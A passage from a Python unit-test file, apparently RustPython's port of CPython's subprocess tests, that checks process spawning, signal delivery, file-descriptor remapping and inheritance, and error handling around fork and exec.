self.assertFalse(gc.isenabled(),
"Popen enabled gc when it shouldn't.")
gc.enable()
self.assertTrue(gc.isenabled())
subprocess.call([sys.executable, '-c', ''],
preexec_fn=lambda: None)
self.assertTrue(gc.isenabled(), "Popen left gc disabled.")
gc.disable = raise_runtime_error
self.assertRaises(RuntimeError, subprocess.Popen,
[sys.executable, '-c', ''],
preexec_fn=lambda: None)
del gc.isenabled # force an AttributeError
self.assertRaises(AttributeError, subprocess.Popen,
[sys.executable, '-c', ''],
preexec_fn=lambda: None)
finally:
gc.disable = orig_gc_disable
gc.isenabled = orig_gc_isenabled
if not enabled:
gc.disable()
# TODO: RUSTPYTHON
@unittest.expectedFailure
@unittest.skipIf(
sys.platform == 'darwin', 'setrlimit() seems to fail on OS X')
def test_preexec_fork_failure(self):
# The internal code did not preserve the previous exception when
# re-enabling garbage collection
try:
from resource import getrlimit, setrlimit, RLIMIT_NPROC
except ImportError as err:
self.skipTest(err) # RLIMIT_NPROC is specific to Linux and BSD
limits = getrlimit(RLIMIT_NPROC)
[_, hard] = limits
setrlimit(RLIMIT_NPROC, (0, hard))
self.addCleanup(setrlimit, RLIMIT_NPROC, limits)
try:
subprocess.call([sys.executable, '-c', ''],
preexec_fn=lambda: None)
except BlockingIOError:
# Forking should raise EAGAIN, translated to BlockingIOError
pass
else:
self.skipTest('RLIMIT_NPROC had no effect; probably superuser')
def test_args_string(self):
# args is a string
fd, fname = tempfile.mkstemp()
# reopen in text mode
with open(fd, "w", errors="surrogateescape") as fobj:
fobj.write("#!%s\n" % support.unix_shell)
fobj.write("exec '%s' -c 'import sys; sys.exit(47)'\n" %
sys.executable)
os.chmod(fname, 0o700)
p = subprocess.Popen(fname)
p.wait()
os.remove(fname)
self.assertEqual(p.returncode, 47)
def test_invalid_args(self):
# invalid arguments should raise ValueError
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
startupinfo=47)
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
creationflags=47)
def test_shell_sequence(self):
# Run command through the shell (sequence)
newenv = os.environ.copy()
newenv["FRUIT"] = "apple"
p = subprocess.Popen(["echo $FRUIT"], shell=1,
stdout=subprocess.PIPE,
env=newenv)
with p:
self.assertEqual(p.stdout.read().strip(b" \t\r\n\f"), b"apple")
def test_shell_string(self):
# Run command through the shell (string)
newenv = os.environ.copy()
newenv["FRUIT"] = "apple"
p = subprocess.Popen("echo $FRUIT", shell=1,
stdout=subprocess.PIPE,
env=newenv)
with p:
self.assertEqual(p.stdout.read().strip(b" \t\r\n\f"), b"apple")
def test_call_string(self):
# call() function with string argument on UNIX
fd, fname = tempfile.mkstemp()
# reopen in text mode
with open(fd, "w", errors="surrogateescape") as fobj:
fobj.write("#!%s\n" % support.unix_shell)
fobj.write("exec '%s' -c 'import sys; sys.exit(47)'\n" %
sys.executable)
os.chmod(fname, 0o700)
rc = subprocess.call(fname)
os.remove(fname)
self.assertEqual(rc, 47)
def test_specific_shell(self):
# Issue #9265: Incorrect name passed as arg[0].
shells = []
for prefix in ['/bin', '/usr/bin/', '/usr/local/bin']:
for name in ['bash', 'ksh']:
sh = os.path.join(prefix, name)
if os.path.isfile(sh):
shells.append(sh)
if not shells: # Will probably work for any shell but csh.
self.skipTest("bash or ksh required for this test")
sh = '/bin/sh'
if os.path.isfile(sh) and not os.path.islink(sh):
# Test will fail if /bin/sh is a symlink to csh.
shells.append(sh)
for sh in shells:
p = subprocess.Popen("echo $0", executable=sh, shell=True,
stdout=subprocess.PIPE)
with p:
self.assertEqual(p.stdout.read().strip(), bytes(sh, 'ascii'))
def _kill_process(self, method, *args):
# Do not inherit file handles from the parent.
# It should fix failures on some platforms.
        # Also set the SIGINT handler to the default to make sure it's not
        # being ignored (some tests rely on that).
old_handler = signal.signal(signal.SIGINT, signal.default_int_handler)
try:
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
time.sleep(30)
"""],
close_fds=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
finally:
signal.signal(signal.SIGINT, old_handler)
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
getattr(p, method)(*args)
return p
@unittest.skipIf(sys.platform.startswith(('netbsd', 'openbsd')),
"Due to known OS bug (issue #16762)")
def _kill_dead_process(self, method, *args):
# Do not inherit file handles from the parent.
# It should fix failures on some platforms.
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
"""],
close_fds=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
# The process should end after this
time.sleep(1)
# This shouldn't raise even though the child is now dead
getattr(p, method)(*args)
p.communicate()
def test_send_signal(self):
p = self._kill_process('send_signal', signal.SIGINT)
_, stderr = p.communicate()
self.assertIn(b'KeyboardInterrupt', stderr)
self.assertNotEqual(p.wait(), 0)
def test_kill(self):
p = self._kill_process('kill')
_, stderr = p.communicate()
self.assertStderrEqual(stderr, b'')
self.assertEqual(p.wait(), -signal.SIGKILL)
def test_terminate(self):
p = self._kill_process('terminate')
_, stderr = p.communicate()
self.assertStderrEqual(stderr, b'')
self.assertEqual(p.wait(), -signal.SIGTERM)
def test_send_signal_dead(self):
# Sending a signal to a dead process
self._kill_dead_process('send_signal', signal.SIGINT)
def test_kill_dead(self):
# Killing a dead process
self._kill_dead_process('kill')
def test_terminate_dead(self):
# Terminating a dead process
self._kill_dead_process('terminate')
def _save_fds(self, save_fds):
fds = []
for fd in save_fds:
inheritable = os.get_inheritable(fd)
saved = os.dup(fd)
fds.append((fd, saved, inheritable))
return fds
def _restore_fds(self, fds):
for fd, saved, inheritable in fds:
os.dup2(saved, fd, inheritable=inheritable)
os.close(saved)
def check_close_std_fds(self, fds):
# Issue #9905: test that subprocess pipes still work properly with
# some standard fds closed
stdin = 0
saved_fds = self._save_fds(fds)
for fd, saved, inheritable in saved_fds:
if fd == 0:
stdin = saved
break
try:
for fd in fds:
os.close(fd)
out, err = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdin=stdin,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE).communicate()
err = support.strip_python_stderr(err)
self.assertEqual((out, err), (b'apple', b'orange'))
finally:
self._restore_fds(saved_fds)
def test_close_fd_0(self):
self.check_close_std_fds([0])
def test_close_fd_1(self):
self.check_close_std_fds([1])
def test_close_fd_2(self):
self.check_close_std_fds([2])
def test_close_fds_0_1(self):
self.check_close_std_fds([0, 1])
def test_close_fds_0_2(self):
self.check_close_std_fds([0, 2])
def test_close_fds_1_2(self):
self.check_close_std_fds([1, 2])
def test_close_fds_0_1_2(self):
# Issue #10806: test that subprocess pipes still work properly with
# all standard fds closed.
self.check_close_std_fds([0, 1, 2])
def test_small_errpipe_write_fd(self):
"""Issue #15798: Popen should work when stdio fds are available."""
new_stdin = os.dup(0)
new_stdout = os.dup(1)
try:
os.close(0)
os.close(1)
# Side test: if errpipe_write fails to have its CLOEXEC
# flag set this should cause the parent to think the exec
# failed. Extremely unlikely: everyone supports CLOEXEC.
subprocess.Popen([
sys.executable, "-c",
"print('AssertionError:0:CLOEXEC failure.')"]).wait()
finally:
# Restore original stdin and stdout
os.dup2(new_stdin, 0)
os.dup2(new_stdout, 1)
os.close(new_stdin)
os.close(new_stdout)
def test_remapping_std_fds(self):
# open up some temporary files
temps = [tempfile.mkstemp() for i in range(3)]
try:
temp_fds = [fd for fd, fname in temps]
# unlink the files -- we won't need to reopen them
for fd, fname in temps:
os.unlink(fname)
# write some data to what will become stdin, and rewind
os.write(temp_fds[1], b"STDIN")
os.lseek(temp_fds[1], 0, 0)
# move the standard file descriptors out of the way
saved_fds = self._save_fds(range(3))
try:
# duplicate the file objects over the standard fd's
for fd, temp_fd in enumerate(temp_fds):
os.dup2(temp_fd, fd)
# now use those files in the "wrong" order, so that subprocess
# has to rearrange them in the child
p = subprocess.Popen([sys.executable, "-c",
'import sys; got = sys.stdin.read();'
'sys.stdout.write("got %s"%got); sys.stderr.write("err")'],
stdin=temp_fds[1],
stdout=temp_fds[2],
stderr=temp_fds[0])
p.wait()
finally:
self._restore_fds(saved_fds)
for fd in temp_fds:
os.lseek(fd, 0, 0)
out = os.read(temp_fds[2], 1024)
err = support.strip_python_stderr(os.read(temp_fds[0], 1024))
self.assertEqual(out, b"got STDIN")
self.assertEqual(err, b"err")
finally:
for fd in temp_fds:
os.close(fd)
def check_swap_fds(self, stdin_no, stdout_no, stderr_no):
# open up some temporary files
temps = [tempfile.mkstemp() for i in range(3)]
temp_fds = [fd for fd, fname in temps]
try:
# unlink the files -- we won't need to reopen them
for fd, fname in temps:
os.unlink(fname)
# save a copy of the standard file descriptors
saved_fds = self._save_fds(range(3))
try:
# duplicate the temp files over the standard fd's 0, 1, 2
for fd, temp_fd in enumerate(temp_fds):
os.dup2(temp_fd, fd)
# write some data to what will become stdin, and rewind
os.write(stdin_no, b"STDIN")
os.lseek(stdin_no, 0, 0)
# now use those files in the given order, so that subprocess
# has to rearrange them in the child
p = subprocess.Popen([sys.executable, "-c",
'import sys; got = sys.stdin.read();'
'sys.stdout.write("got %s"%got); sys.stderr.write("err")'],
stdin=stdin_no,
stdout=stdout_no,
stderr=stderr_no)
p.wait()
for fd in temp_fds:
os.lseek(fd, 0, 0)
out = os.read(stdout_no, 1024)
err = support.strip_python_stderr(os.read(stderr_no, 1024))
finally:
self._restore_fds(saved_fds)
self.assertEqual(out, b"got STDIN")
self.assertEqual(err, b"err")
finally:
for fd in temp_fds:
os.close(fd)
    # When duplicating fds, if one of the target fds is 0, 1 or 2, it is
    # possible that it gets overwritten (#12607). This tests all
    # permutations of that.
def test_swap_fds(self):
self.check_swap_fds(0, 1, 2)
self.check_swap_fds(0, 2, 1)
self.check_swap_fds(1, 0, 2)
self.check_swap_fds(1, 2, 0)
self.check_swap_fds(2, 0, 1)
self.check_swap_fds(2, 1, 0)
def _check_swap_std_fds_with_one_closed(self, from_fds, to_fds):
saved_fds = self._save_fds(range(3))
try:
for from_fd in from_fds:
with tempfile.TemporaryFile() as f:
os.dup2(f.fileno(), from_fd)
fd_to_close = (set(range(3)) - set(from_fds)).pop()
os.close(fd_to_close)
arg_names = ['stdin', 'stdout', 'stderr']
kwargs = {}
for from_fd, to_fd in zip(from_fds, to_fds):
kwargs[arg_names[to_fd]] = from_fd
code = textwrap.dedent(r'''
import os, sys
skipped_fd = int(sys.argv[1])
for fd in range(3):
if fd != skipped_fd:
os.write(fd, str(fd).encode('ascii'))
''')
skipped_fd = (set(range(3)) - set(to_fds)).pop()
rc = subprocess.call([sys.executable, '-c', code, str(skipped_fd)],
**kwargs)
self.assertEqual(rc, 0)
for from_fd, to_fd in zip(from_fds, to_fds):
os.lseek(from_fd, 0, os.SEEK_SET)
read_bytes = os.read(from_fd, 1024)
read_fds = list(map(int, read_bytes.decode('ascii')))
msg = textwrap.dedent(f"""
When testing {from_fds} to {to_fds} redirection,
parent descriptor {from_fd} got redirected
to descriptor(s) {read_fds} instead of descriptor {to_fd}.
""")
self.assertEqual([to_fd], read_fds, msg)
finally:
self._restore_fds(saved_fds)
# Check that subprocess can remap std fds correctly even
# if one of them is closed (#32844).
def test_swap_std_fds_with_one_closed(self):
for from_fds in itertools.combinations(range(3), 2):
for to_fds in itertools.permutations(range(3), 2):
self._check_swap_std_fds_with_one_closed(from_fds, to_fds)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_surrogates_error_message(self):
def prepare():
raise ValueError("surrogate:\uDCff")
try:
subprocess.call(
ZERO_RETURN_CMD,
preexec_fn=prepare)
except ValueError as err:
            # The pure Python implementation keeps the message
self.assertIsNone(subprocess._posixsubprocess)
self.assertEqual(str(err), "surrogate:\uDCff")
except subprocess.SubprocessError as err:
# _posixsubprocess uses a default message
self.assertIsNotNone(subprocess._posixsubprocess)
self.assertEqual(str(err), "Exception occurred in preexec_fn.")
else:
self.fail("Expected ValueError or subprocess.SubprocessError")
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_undecodable_env(self):
for key, value in (('test', 'abc\uDCFF'), ('test\uDCFF', '42')):
encoded_value = value.encode("ascii", "surrogateescape")
# test str with surrogates
script = "import os; print(ascii(os.getenv(%s)))" % repr(key)
env = os.environ.copy()
env[key] = value
# Use C locale to get ASCII for the locale encoding to force
# surrogate-escaping of \xFF in the child process
env['LC_ALL'] = 'C'
decoded_value = value
stdout = subprocess.check_output(
[sys.executable, "-c", script],
env=env)
stdout = stdout.rstrip(b'\n\r')
self.assertEqual(stdout.decode('ascii'), ascii(decoded_value))
# test bytes
key = key.encode("ascii", "surrogateescape")
script = "import os; print(ascii(os.getenvb(%s)))" % repr(key)
env = os.environ.copy()
env[key] = encoded_value
stdout = subprocess.check_output(
[sys.executable, "-c", script],
env=env)
stdout = stdout.rstrip(b'\n\r')
self.assertEqual(stdout.decode('ascii'), ascii(encoded_value))
def test_bytes_program(self):
abs_program = os.fsencode(ZERO_RETURN_CMD[0])
args = list(ZERO_RETURN_CMD[1:])
path, program = os.path.split(ZERO_RETURN_CMD[0])
program = os.fsencode(program)
# absolute bytes path
exitcode = subprocess.call([abs_program]+args)
self.assertEqual(exitcode, 0)
# absolute bytes path as a string
cmd = b"'%s' %s" % (abs_program, " ".join(args).encode("utf-8"))
exitcode = subprocess.call(cmd, shell=True)
self.assertEqual(exitcode, 0)
# bytes program, unicode PATH
env = os.environ.copy()
env["PATH"] = path
exitcode = subprocess.call([program]+args, env=env)
self.assertEqual(exitcode, 0)
# bytes program, bytes PATH
envb = os.environb.copy()
envb[b"PATH"] = os.fsencode(path)
exitcode = subprocess.call([program]+args, env=envb)
self.assertEqual(exitcode, 0)
def test_pipe_cloexec(self):
sleeper = support.findfile("input_reader.py", subdir="subprocessdata")
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
p1 = subprocess.Popen([sys.executable, sleeper],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, close_fds=False)
self.addCleanup(p1.communicate, b'')
p2 = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=False)
output, error = p2.communicate()
result_fds = set(map(int, output.split(b',')))
unwanted_fds = set([p1.stdin.fileno(), p1.stdout.fileno(),
p1.stderr.fileno()])
self.assertFalse(result_fds & unwanted_fds,
"Expected no fds from %r to be open in child, "
"found %r" %
(unwanted_fds, result_fds & unwanted_fds))
def test_pipe_cloexec_real_tools(self):
qcat = support.findfile("qcat.py", subdir="subprocessdata")
qgrep = support.findfile("qgrep.py", subdir="subprocessdata")
subdata = b'zxcvbn'
data = subdata * 4 + b'\n'
p1 = subprocess.Popen([sys.executable, qcat],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
close_fds=False)
p2 = subprocess.Popen([sys.executable, qgrep, subdata],
stdin=p1.stdout, stdout=subprocess.PIPE,
close_fds=False)
self.addCleanup(p1.wait)
self.addCleanup(p2.wait)
def kill_p1():
try:
p1.terminate()
except ProcessLookupError:
pass
def kill_p2():
try:
p2.terminate()
except ProcessLookupError:
pass
self.addCleanup(kill_p1)
self.addCleanup(kill_p2)
p1.stdin.write(data)
p1.stdin.close()
readfiles, ignored1, ignored2 = select.select([p2.stdout], [], [], 10)
self.assertTrue(readfiles, "The child hung")
self.assertEqual(p2.stdout.read(), data)
p1.stdout.close()
p2.stdout.close()
@unittest.skip("TODO: RUSTPYTHON, flaky test")
def test_close_fds(self):
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
fds = os.pipe()
self.addCleanup(os.close, fds[0])
self.addCleanup(os.close, fds[1])
open_fds = set(fds)
# add a bunch more fds
for _ in range(9):
fd = os.open(os.devnull, os.O_RDONLY)
self.addCleanup(os.close, fd)
open_fds.add(fd)
for fd in open_fds:
os.set_inheritable(fd, True)
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=False)
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertEqual(remaining_fds & open_fds, open_fds,
"Some fds were closed")
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True)
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertFalse(remaining_fds & open_fds,
"Some fds were left open")
self.assertIn(1, remaining_fds, "Subprocess failed")
# Keep some of the fd's we opened open in the subprocess.
# This tests _posixsubprocess.c's proper handling of fds_to_keep.
fds_to_keep = set(open_fds.pop() for _ in range(8))
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True,
pass_fds=fds_to_keep)
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertFalse((remaining_fds - fds_to_keep) & open_fds,
"Some fds not in pass_fds were left open")
self.assertIn(1, remaining_fds, "Subprocess failed")
@unittest.skipIf(sys.platform.startswith("freebsd") and
os.stat("/dev").st_dev == os.stat("/dev/fd").st_dev,
"Requires fdescfs mounted on /dev/fd on FreeBSD.")
def test_close_fds_when_max_fd_is_lowered(self):
"""Confirm that issue21618 is fixed (may fail under valgrind)."""
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
        # This launches the meat of the test in a child process to
        # avoid messing with the larger unittest process's maximum
        # number of file descriptors.
        # This process launches:
        # +--> Process that lowers its RLIMIT_NOFILE after setting up
# a bunch of high open fds above the new lower rlimit.
# Those are reported via stdout before launching a new
# process with close_fds=False to run the actual test:
# +--> The TEST: This one launches a fd_status.py
# subprocess with close_fds=True so we can find out if
# any of the fds above the lowered rlimit are still open.
p = subprocess.Popen([sys.executable, '-c', textwrap.dedent(
'''
import os, resource, subprocess, sys, textwrap
open_fds = set()
# Add a bunch more fds to pass down.
for _ in range(40):
fd = os.open(os.devnull, os.O_RDONLY)
open_fds.add(fd)
# Leave a two pairs of low ones available for use by the
# internal child error pipe and the stdout pipe.
# We also leave 10 more open as some Python buildbots run into
# "too many open files" errors during the test if we do not.
for fd in sorted(open_fds)[:14]:
os.close(fd)
open_fds.remove(fd)
for fd in open_fds:
#self.addCleanup(os.close, fd)
os.set_inheritable(fd, True)
max_fd_open = max(open_fds)
# Communicate the open_fds to the parent unittest.TestCase process.
print(','.join(map(str, sorted(open_fds))))
sys.stdout.flush()
rlim_cur, rlim_max = resource.getrlimit(resource.RLIMIT_NOFILE)
try:
# 29 is lower than the highest fds we are leaving open.
resource.setrlimit(resource.RLIMIT_NOFILE, (29, rlim_max))
# Launch a new Python interpreter with our low fd rlim_cur that
# inherits open fds above that limit. It then uses subprocess
# with close_fds=True to get a report of open fds in the child.
# An explicit list of fds to check is passed to fd_status.py as
# letting fd_status rely on its default logic would miss the
# fds above rlim_cur as it normally only checks up to that limit.
subprocess.Popen(
[sys.executable, '-c',
textwrap.dedent("""
import subprocess, sys
subprocess.Popen([sys.executable, %r] +
[str(x) for x in range({max_fd})],
close_fds=True).wait()
""".format(max_fd=max_fd_open+1))],
close_fds=False).wait()
finally:
resource.setrlimit(resource.RLIMIT_NOFILE, (rlim_cur, rlim_max))
''' % fd_status)], stdout=subprocess.PIPE)
output, unused_stderr = p.communicate()
output_lines = output.splitlines()
self.assertEqual(len(output_lines), 2,
msg="expected exactly two lines of output:\n%r" % output)
opened_fds = set(map(int, output_lines[0].strip().split(b',')))
remaining_fds = set(map(int, output_lines[1].strip().split(b',')))
self.assertFalse(remaining_fds & opened_fds,
msg="Some fds were left open.")
@unittest.skip("TODO: RUSTPYTHON, flaky test")
# Mac OS X Tiger (10.4) has a kernel bug: sometimes, the file
# descriptor of a pipe closed in the parent process is valid in the
# child process according to fstat(), but the mode of the file
# descriptor is invalid, and read or write raise an error.
@support.requires_mac_ver(10, 5)
def test_pass_fds(self):
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
open_fds = set()
for x in range(5):
fds = os.pipe()
self.addCleanup(os.close, fds[0])
self.addCleanup(os.close, fds[1])
os.set_inheritable(fds[0], True)
os.set_inheritable(fds[1], True)
open_fds.update(fds)
for fd in open_fds:
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True,
pass_fds=(fd, ))
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
to_be_closed = open_fds - {fd}
self.assertIn(fd, remaining_fds, "fd to be passed not passed")
self.assertFalse(remaining_fds & to_be_closed,
"fd to be closed passed")
# pass_fds overrides close_fds with a warning.
with self.assertWarns(RuntimeWarning) as context:
self.assertFalse(subprocess.call(
ZERO_RETURN_CMD,
close_fds=False, pass_fds=(fd, )))
self.assertIn('overriding close_fds', str(context.warning))
def test_pass_fds_inheritable(self):
script = support.findfile("fd_status.py", subdir="subprocessdata")
inheritable, non_inheritable = os.pipe()
self.addCleanup(os.close, inheritable)
self.addCleanup(os.close, non_inheritable)
os.set_inheritable(inheritable, True)
os.set_inheritable(non_inheritable, False)
pass_fds = (inheritable, non_inheritable)
args = [sys.executable, script]
args += list(map(str, pass_fds))
p = subprocess.Popen(args,
stdout=subprocess.PIPE, close_fds=True,
pass_fds=pass_fds)
output, ignored = p.communicate()
fds = set(map(int, output.split(b',')))
# the inheritable file descriptor must be inherited, so its inheritable
# flag must be set in the child process after fork() and before exec()
self.assertEqual(fds, set(pass_fds), "output=%a" % output)
# inheritable flag must not be changed in the parent process
self.assertEqual(os.get_inheritable(inheritable), True)
self.assertEqual(os.get_inheritable(non_inheritable), False)
# bpo-32270: Ensure that descriptors specified in pass_fds
# are inherited even if they are used in redirections.
# Contributed by @izbyshev.
def test_pass_fds_redirected(self):
"""Regression test for https://bugs.python.org/issue32270."""
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
pass_fds = []
for _ in range(2):
fd = os.open(os.devnull, os.O_RDWR)
self.addCleanup(os.close, fd)
pass_fds.append(fd)
stdout_r, stdout_w = os.pipe()
self.addCleanup(os.close, stdout_r)
self.addCleanup(os.close, stdout_w)
pass_fds.insert(1, stdout_w)
with subprocess.Popen([sys.executable, fd_status],
stdin=pass_fds[0],
stdout=pass_fds[1],
stderr=pass_fds[2],
close_fds=True,
pass_fds=pass_fds):
output = os.read(stdout_r, 1024)
fds = {int(num) for num in output.split(b',')}
self.assertEqual(fds, {0, 1, 2} | frozenset(pass_fds), f"output={output!a}")
def test_stdout_stdin_are_single_inout_fd(self):
with io.open(os.devnull, "r+") as inout:
p = subprocess.Popen(ZERO_RETURN_CMD,
stdout=inout, stdin=inout)
p.wait()
def test_stdout_stderr_are_single_inout_fd(self):
with io.open(os.devnull, "r+") as inout:
p = subprocess.Popen(ZERO_RETURN_CMD,
stdout=inout, stderr=inout)
p.wait()
def test_stderr_stdin_are_single_inout_fd(self):
with io.open(os.devnull, "r+") as inout:
p = subprocess.Popen(ZERO_RETURN_CMD,
stderr=inout, stdin=inout)
p.wait()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_wait_when_sigchild_ignored(self):
# NOTE: sigchild_ignore.py may not be an effective test on all OSes.
sigchild_ignore = support.findfile("sigchild_ignore.py",
subdir="subprocessdata")
p = subprocess.Popen([sys.executable, sigchild_ignore],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
self.assertEqual(0, p.returncode, "sigchild_ignore.py exited"
" non-zero with this error:\n%s" %
stderr.decode('utf-8'))
def test_select_unbuffered(self):
# Issue #11459: bufsize=0 should really set the pipes as
# unbuffered (and therefore let select() work properly).
select = support.import_module("select")
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple")'],
stdout=subprocess.PIPE,
bufsize=0)
f = p.stdout
self.addCleanup(f.close)
try:
self.assertEqual(f.read(4), b"appl")
self.assertIn(f, select.select([f], [], [], 0.0)[0])
finally:
p.wait()
def test_zombie_fast_process_del(self):
# Issue #12650: on Unix, if Popen.__del__() was called before the
# process exited, it wouldn't be added to subprocess._active, and would
# remain a zombie.
# spawn a Popen, and delete its reference before it exits
p = subprocess.Popen([sys.executable, "-c",
'import sys, time;'
'time.sleep(0.2)'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
ident = id(p)
pid = p.pid
with support.check_warnings(('', ResourceWarning)):
p = None
if mswindows:
# subprocess._active is not used on Windows and is set to None.
self.assertIsNone(subprocess._active)
else:
# check that p is in the active processes list
self.assertIn(ident, [id(o) for o in subprocess._active])
def test_leak_fast_process_del_killed(self):
# Issue #12650: on Unix, if Popen.__del__() was called before the
# process exited, and the process got killed by a signal, it would never
# be removed from subprocess._active, which triggered a FD and memory
# leak.
# spawn a Popen, delete its reference and kill it
p = subprocess.Popen([sys.executable, "-c",
'import time;'
'time.sleep(3)'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
ident = id(p)
pid = p.pid
with support.check_warnings(('', ResourceWarning)):
p = None
os.kill(pid, signal.SIGKILL)
if mswindows:
# subprocess._active is not used on Windows and is set to None.
self.assertIsNone(subprocess._active)
else:
# check that p is in the active processes list
self.assertIn(ident, [id(o) for o in subprocess._active])
# let some time for the process to exit, and create a new Popen: this
# should trigger the wait() of p
time.sleep(0.2)
with self.assertRaises(OSError):
with subprocess.Popen(NONEXISTING_CMD,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as proc:
pass
# p should have been wait()ed on, and removed from the _active list
self.assertRaises(OSError, os.waitpid, pid, 0)
if mswindows:
# subprocess._active is not used on Windows and is set to None.
self.assertIsNone(subprocess._active)
else:
self.assertNotIn(ident, [id(o) for o in subprocess._active])
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_close_fds_after_preexec(self):
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
# this FD is used as dup2() target by preexec_fn, and should be closed
# in the child process
fd = os.dup(1)
self.addCleanup(os.close, fd)
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True,
preexec_fn=lambda: os.dup2(1, fd))
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertNotIn(fd, remaining_fds)
@support.cpython_only
def test_fork_exec(self):
# Issue #22290: fork_exec() must not crash on memory allocation failure
# or other errors
import _posixsubprocess
gc_enabled = gc.isenabled()
try:
# Use a preexec function and enable the garbage collector
# to force fork_exec() to re-enable the garbage collector
# on error.
func = lambda: None
gc.enable()
for args, exe_list, cwd, env_list in (
(123, [b"exe"], None, [b"env"]),
([b"arg"], 123, None, [b"env"]),
([b"arg"], [b"exe"], 123, [b"env"]),
([b"arg"], [b"exe"], None, 123),
):
with self.assertRaises(TypeError):
_posixsubprocess.fork_exec(
args, exe_list,
True, (), cwd, env_list,
-1, -1, -1, -1,
1, 2, 3, 4,
True, True, func)
finally:
if not gc_enabled:
gc.disable()
@support.cpython_only
def test_fork_exec_sorted_fd_sanity_check(self):
# Issue #23564: sanity check the fork_exec() fds_to_keep sanity check.
import _posixsubprocess
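        # BadInt.__int__() succeeds once per instance and then raises, to
        # exercise error handling while fds_to_keep is being converted.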
class BadInt:
first = True
def __init__(self, value):
self.value = value
def __int__(self):
if self.first:
self.first = False
return self.value
raise ValueError
gc_enabled = gc.isenabled()
try:
gc.enable()
for fds_to_keep in (
(-1, 2, 3, 4, 5), # Negative number.
('str', 4), # Not an int.
(18, 23, 42, 2**63), # Out of range.
(5, 4), # Not sorted.
(6, 7, 7, 8), # Duplicate.
(BadInt(1), BadInt(2)),
):
with self.assertRaises(
ValueError,
msg='fds_to_keep={}'.format(fds_to_keep)) as c:
_posixsubprocess.fork_exec(
[b"false"], [b"false"],
True, fds_to_keep, None, [b"env"],
-1, -1, -1, -1,
1, 2, 3, 4,
True, True, None)
self.assertIn('fds_to_keep', str(c.exception))
finally:
if not gc_enabled:
gc.disable()
def test_communicate_BrokenPipeError_stdin_close(self):
# By not setting stdout or stderr or a timeout we force the fast path
# that just calls _stdin_write() internally due to our mock.
proc = subprocess.Popen(ZERO_RETURN_CMD)
with proc, mock.patch.object(proc, 'stdin') as mock_proc_stdin:
mock_proc_stdin.close.side_effect = BrokenPipeError
proc.communicate() # Should swallow BrokenPipeError from close.
mock_proc_stdin.close.assert_called_with()
def test_communicate_BrokenPipeError_stdin_write(self):
# By not setting stdout or stderr or a timeout we force the fast path
# that just calls _stdin_write() internally due to our mock.
proc = subprocess.Popen(ZERO_RETURN_CMD)
with proc, mock.patch.object(proc, 'stdin') as mock_proc_stdin:
mock_proc_stdin.write.side_effect = BrokenPipeError
proc.communicate(b'stuff') # Should swallow the BrokenPipeError.
mock_proc_stdin.write.assert_called_once_with(b'stuff')
mock_proc_stdin.close.assert_called_once_with()
def test_communicate_BrokenPipeError_stdin_flush(self):
# Setting stdin and stdout forces the ._communicate() code path.
# python -h exits faster than python -c pass (but spams stdout).
proc = subprocess.Popen([sys.executable, '-h'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE)
with proc, mock.patch.object(proc, 'stdin') as mock_proc_stdin, \
open(os.devnull, 'wb') as dev_null:
mock_proc_stdin.flush.side_effect = BrokenPipeError
# because _communicate registers a selector using proc.stdin...
mock_proc_stdin.fileno.return_value = dev_null.fileno()
# _communicate() should swallow BrokenPipeError from flush.
proc.communicate(b'stuff')
mock_proc_stdin.flush.assert_called_once_with()
def test_communicate_BrokenPipeError_stdin_close_with_timeout(self):
# Setting stdin and stdout forces the ._communicate() code path.
# python -h exits faster than python -c pass (but spams stdout).
proc = subprocess.Popen([sys.executable, '-h'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE)
